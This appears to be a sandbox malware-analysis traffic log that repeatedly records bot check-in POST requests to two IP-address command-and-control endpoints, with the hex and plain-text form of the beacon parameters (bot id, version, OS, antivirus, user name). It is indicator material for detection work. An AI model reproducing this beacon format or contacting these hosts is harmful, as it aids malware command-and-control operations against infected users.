                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
